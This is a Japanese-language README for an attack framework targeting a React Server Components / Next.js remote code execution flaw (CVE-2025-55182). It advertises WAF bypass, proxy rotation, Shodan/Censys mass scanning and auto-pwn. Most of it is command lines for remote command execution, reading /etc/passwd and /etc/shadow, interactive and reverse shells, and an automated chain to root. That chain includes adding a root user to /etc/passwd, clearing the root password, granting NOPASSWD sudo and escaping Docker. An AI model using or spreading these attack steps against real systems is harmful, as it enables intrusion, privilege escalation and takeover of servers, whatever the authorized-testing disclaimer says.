CVE-2025-55182(React Server Components RCE)向けエリートエクスプロイテーションツールキット。非同期ポリモーフィックペイロード、高度なWAF/CDNバイパス、プロキシローテーション、Shodan/Censysマススキャン、auto-pwn + リバースシェル、Nucleiテンプレート、K8sラボ&C2ダッシュボード。著者:Sudeepa Wanigarathna – 許可されたレッドチームおよびペネトレーションテスト専用。
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Next.js Server Actions RCE 脆弱性(React2Shell)向けのプロフェッショナルグレードのエクスプロイトフレームワーク。初期アクセスから root 権限昇格までの完全な攻撃チェーンを実証します。
機能:
# 脆弱性の確認
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# コマンド実行
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# 完全なエクスプロイト: RCE → 列挙 → root アクセス
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # コアエクスプロイトエンジン(400 行以上)
├── demo_exploit.py # 自動攻撃チェーン(290 行以上)
├── interactive_shell.py # 対話型シェル(280 行以上)
├── reverse_shell_handler.py # リバースシェルリスナー(180 行以上)
├── post_exploit/
│ ├── linux_enum.py # システム列挙(330 行以上)
│ ├── priv_esc.py # 権限昇格(320 行以上)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # 完全な使用ドキュメント
├── QUICKSTART.md # クイックリファレンス
└── BANNER.txt
# 脆弱性チェック
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# コマンド実行
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# 異なるペイロードバリアント
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# 難読化あり
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# シェルの起動
python3 interactive_shell.py --target http://127.0.0.1:3000
# 利用可能なコマンド:
# - execute <cmd> : シェルコマンドを実行
# - enum : 完全な列挙を実行
# - escalate : 権限昇格を試行
# - upload <local> <remote> : ファイルをアップロード
# - download <remote> <local>: ファイルをダウンロード
# - shell <lhost> <lport>: リバースシェルを展開
# - info : セッション情報を表示
# - exit : 終了
# ターミナル 1: リスナーを起動
python3 reverse_shell_handler.py --lport 4444
# ターミナル 2: シェルを展開
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# 完全チェーン: 検出 → RCE → 列挙 → root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
このフレームワークは完全な 6 ステップのエクスプロイトチェーンを実装しています:
id コマンドでコード実行を確認/etc/shadow の読み取りと /root の一覧表示で root アクセスを証明SUID バイナリ(GTFOBins)
書き込み可能な /etc ファイル
/etc/passwd - 新しい root ユーザーを追加/etc/shadow - root パスワードをクリア/etc/sudoers - NOPASSWD sudo を付与Docker エスケープ
カーネルエクスプロイト
Linux ケーパビリティ
pip install -r requirements.txt
依存関係:
EXPLOITATION_GUIDE.md - 例付きの完全な使用ガイドQUICKSTART.md - 一般的なコマンドのクイックリファレンス警告: このツールは許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
作者はこのツールの誤用について一切の責任を負いません。自己責任で使用してください。
このフレームワークは以下を目的として設計されています:
MIT ライセンス(教育目的のみ)
Sudeepa Wanigarathna
バージョン: 1.0
最終更新日: 2025 年 12 月
詳細な使用手順については、EXPLOITATION_GUIDE.md を参照してください。